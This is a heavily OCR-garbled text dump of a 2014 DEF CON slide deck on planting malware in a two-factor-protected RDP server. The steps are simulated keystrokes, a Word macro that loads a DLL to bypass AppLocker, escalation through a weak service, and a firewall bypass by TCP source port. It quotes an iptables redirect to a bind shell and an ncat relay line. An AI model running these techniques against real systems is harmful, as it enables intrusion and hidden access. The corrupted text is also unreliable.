desktops in 20 seconds Zoltan Balazs DLl CON 22, 2014 rootkali:~4 whoami Zoltan Balazs rootkali:~4 whoami rootkali:~4 whoami AV testing AV bypass rootkali:~4 whoami OSCP: Occasional Satire Captain Punk CISSP: Certiied Interspecie-ial Sheep Shearing Proessional CP1S: Certiied Pajama 1oaster Specialist MCP: Microsot Certiied Psychopath OS\P: Oicial Sexiest \easel Popstar CllI: Chronic lopeless llux Incompetent Im NO1 a CLl CyberLympics2012 C1l 2nd runners up gula.sh Creator o the Zombie Browser 1oolkit https:,,github.com,Z6543,ZombieBrowserPack lungary I loe hacking low do you hack high security systems low do you hack high security systems when you are not 1om Cruise 1he mission Im a spy ,with low budget, I want access to a hardened secure RDP ,remote desktop, serer L.g. serer contains conidential documents I need persistent C&C access to the RDP serer 1o upload,download iles Interactie remote code execution 1he solution ,in an ideal world, Infected workstation Secure remote desktop server 1. Infect clients desktop 2. Steal RDP password 3. Connect to RDP 4. Drop malware 5. Command and Control 6. Proit 1he challenges RDP serer is not reachable rom the Internet Directly 1wo actor authentication is used to access the RDP serer No access to the token seeds ,, Drie mapping disabled no direct ile copy Restrictie hardware irewall Allows workstation - serer 1CP port 3389 IP4 only Application white list is used on the RDP serer M> Applocker in my case with deault policy Firewall, port 3389 allowed only Is this realistic Similar enironment at a client lad no time to hack it Infected workstation Secure remote desktop server Target Company The Internet Attacker Firewall, port 3389 allowed only In hacking, there is no such thing as impossible. Only things that are more challenging. Already achieed I have remote code execution with C&C on a users workstation I hae access to a test RDP serer I know how the iles on the serer look like, what serices are installed 1his is Spartaaaa post-exploitation \hy should you care about this !"# %"&'()"*%"+%", New tools -./" %"&' New things to look or during log analysis,incident response 01.234 '&5",(6/+2*"++ lunny pictures Diide et impera! Diide the problem into smaller pieces and rule them all, one by one 1. drop malware into the RDP serer 2. execute any code on RDP serer 3. eleate to admin priileges 4. bypass hardware irewall Diide et impera! Diide the problem into smaller pieces and rule them all, one by one 78 #,1) '&.9&," 2*%1 %:" !;0 +",<", = *"9 +:2*4 %11. 2. execute any code on RDP serer nothing new here 3. eleate to admin priileges nothing new, no 0day or you >8 64)&++ :&,#9&," ?2,"9&.. @= *"9 +:2*4 %11. 1. Drop malware into RDP serer 1. Drop malware into RDP serer Malware waits or the user to connect to RDP serer Creates screenshot ,or new animation,, show in oreground Optionally blocks user keyboard, mouse ~20 seconds Uses the keyboard and the clipboard simulates user 1. Starts M> \ord on RDP serer 2. Drops encoded ASCII payload 3. Creates Macro code 4. Macro writes binary 5. Macro starts binaries Alternative usage of user simulator 1. Add directory to be excluded rom AV scans use the AV GUI! only i the user has the priileges and no UAC 2. Install new trusted root certiication authority and accept warning and Mi1M SSL connections CA pinning does not stop this attack 1he AV is alie. Nope, Chuck 1esta 2. \hat is Applocker 2. Lxecute any code, bypass Applocker AppLocker can only control VBScript, JScript, .bat iles, .cmd iles and \indows PowerShell scripts. It does not control all interpreted code that runs within a host process, or example Perl scripts and macros. Applications could contain lags that are passed to unctions that signal AppLocker to circument the rules and allow another .exe or .dll ile to be loaded. 1he administrator on the local computer can modiy the AppLocker policies deined in the local GPO. Lxecute any code, bypass Applocker Load DLL with \ord Macro! Len shellcode execution is possible! http:,,blog.didiersteens.com,2008,06,05,bpmtk- how-about-srp-whitelists, Priate Declare PtrSae lunction LoadLibrary Lib "kernel32" Alias "LoadLibraryA" ,ByVal lpLiblileName As String, As Long hLibrary ~ LoadLibrary,outputdir - "`hack_serice.dll", 3. Lleate to admin 3. Lleate to admin \hy do I need admin It is needed or the last phase, hardware irewall bypass Possibilities Local pri esc zero day or \in 2012 Lxploit unpatched ulnerability Lxploit ulnerable 3 rd party program serice Ltc. Processes started with admin ,or higher, priileges are not restricted by AppLocker! Lleate to admin - Serice exploit C:` accesschk.exe l mulnserice.exe |0| ACCLSS_ALLO\LD_ACL_1\PL: N1 AU1lORI1\`1LRMINAL SLRVLR USLR lILL_APPLND_DA1A lILL_LXLCU1L lILL_RLAD_A11RIBU1LS lILL_RLAD_DA1A lILL_RLAD_LA lILL_\RI1L_A11RIBU1LS lILL_\RI1L_DA1A lILL_\RI1L_LA S\NClRONIZL RLAD_CON1ROLs C:` sc sdshow myulnserice D:,A,,CCLCS\RP\PD1LOCRRC,,,S\, ,A,,CCDCLCS\RP\PD1LOCRSDRC\D\O,,,BA,,A,,CCLCS\LOCRRCRP\P,,,IU,,A,,CCLCS\LOCRRC,,,SU, Lleate to admin - Serice exploit C:` accesschk.exe l mulnserice.exe |0| ACCLSS_ALLO\LD_ACL_1\PL: N1 AU1lORI1\`1LRMINAL SLRVLR USLR lILL_APPLND_DA1A lILL_LXLCU1L lILL_RLAD_A11RIBU1LS lILL_RLAD_DA1A lILL_RLAD_LA lILL_\RI1L_A11RIBU1LS lILL_\RI1L_DA1A lILL_\RI1L_LA S\NClRONIZL RLAD_CON1ROLs C:` sc sdshow myulnserice D:,A,,CCLCS\RP\PD1LOCRRC,,,S\, ,A,,CCDCLCS\RP\PD1LOCRSDRC\D\O,,,BA,,A,,CCLCS\LOCRRCRP\P,,,IU,,A,,CCLCS\LOCRRC,,,SU, Allow Serice start Serice stop Interactiely logged on user Quiz Quiz Whats the name of the company which published the irst paper about packet ilter irewalls in 1988 Quiz Whats the name of the company which published the irst paper about packet ilter irewalls in 1988 1he company deeloped VAX Quiz Whats the name of the company which published the irst paper about packet ilter irewalls in 1988 ;igital Aquipment Borporation 4. Bypass hardware irewall Restrictie irewall No Bind shell No Reerse shell No coert channel DNS, ICMP, IP6, UDP, proxy No shell!!! In a dierent scenario 1CP socket reuse shell possible ,not persistent, \ebshell ,lame, possible But not in this case ,no exploit, no webserer, 4. Bypass hardware irewall lirst ,bad, idea Ater malware dropped, mark eery packet to be special start with magic bytes and let a kernel network ilter drier select the packets Problem Lery ,hacker, application has to be rewritten, or rerouted through a custom wrapper proxy ,both serer and client side, Bypass l\ irewall second idea Use 1CP source port! L.g. port 133 is always special Limitations NA1 rom the attacker side But who cares Bypassing hardware irewalls Linux Use code at Kernel leel ,with root, i ,,tcp_source_port ~~~ 133, && ,tcp_dest_port ~~~ 22,, then: redirect to bind shell on port 3133 iptables -t nat -A PRLROU1ING -p tcp --dport 22 -- sport 133 -j RLDIRLC1 --to-ports 3133 Attacker or infected workstation Firewall, port 3389 allowed only Secure remote desktop server Src port 1337 Dst port 3389 Dst port 3389 Dst port 31337 Bypassing hardware irewalls on \indows x64 Installing a kernel drier in \indows x64 is not triial 1rusted signed drier is needed 1hanks to basil or \inDiert project ,and Nemea Sotware Deelopment, 1rusted signed kernel drier already included! \ou can interace with the kernel drier Alternatiely, patchguard bypass could be used http:,,www.codeproject.com,Articles,28318,Bypassing- PatchGuard Uroburos rootkit Bring \our Own Vuln Install root CA irst with user simulator ,, low to set 1CP source port or meterpreter bind shell ,or any program, Netcat ,Nmap build, to da rescue! ncat -kl 4444 -c "ncat -p 133 RDP.SLR.VLR.IP 3389" Demo Alternative usage of hw w bypass \ou hae admin on webserer but persistent outbound C&C is blocked Instead o local port orward, use netcat to port orward to other machines in the DMZ Backdoor traic to hide your communication inside the legit network traic 1he solution as a whole Malware waits or the user to login to RDP with 2lA Create screenshot rom user desktop Put screenshot on the screen Disable keyboard,mouse Drop malware by simulating user keyboard eents - clipboard or large ,ASCII, data transer Start \ORD, create new macro code Bypass application whitelist using DLL loading rom \ord macro code 1he solution Lscalate priileges to admin ,ulnerable serice, Install hwwbypass.exe with kernel drier Drop meterpreter Proit! Demo Demo 2 as seen by the user Lessons learned or red team \ou hae two new tools or your post exploitation tool to drop malware into the remote desktop I you hae admin on a \indows serer, you can bypass,ool hardware irewalls using my drier Lessons learned or the blue team Lery additional layer o security can still be bypassed Restricted remote desktop is a real interace or malware inection Use application,protocol aware ,NG, irewall instead o port based ones Can be bypassed ,, Dont trust your firewall logs blindly Code release now Reerences http:,,reqrypt.org,windiert.html http:,,inputsimulator.codeplex.com, - modiied http:,,www.blackhat.com,presentations,bh-usa-06,Bl- US-06-1ereshkin.pd http:,,blog.didiersteens.com,2011,01,24,circumenting- srp-and-applocker-by-design, http:,,www.room362.com,blog,2014,01,16,application- whitelist-bypass-using-ieexec-dot-exe http:,,leastpriilege.blogspot.r,2013,04,bypass- applocker-by-loading-dlls-rom.htmlm~1 https:,,www.mandiant.com,blog,hikit-rootkit-adanced- persistent-attack-techniques-part-2, one more thing two more things User simulator aailable as Metasploit post module l\ l\ bypass aailable as Metasploit post module lack 1he Planet! https:,,github.com,MRGLitas,\rite-into-screen https:,,github.com,MRGLitas,hwwbypass zoltan.balazsmrg-eitas.com https:,,hu.linkedin.com,in,zbalazs 1witter zh4ck www.slideshare.net,bz98 Greetz to hekkcamp JumpLSPJump.blogspot.com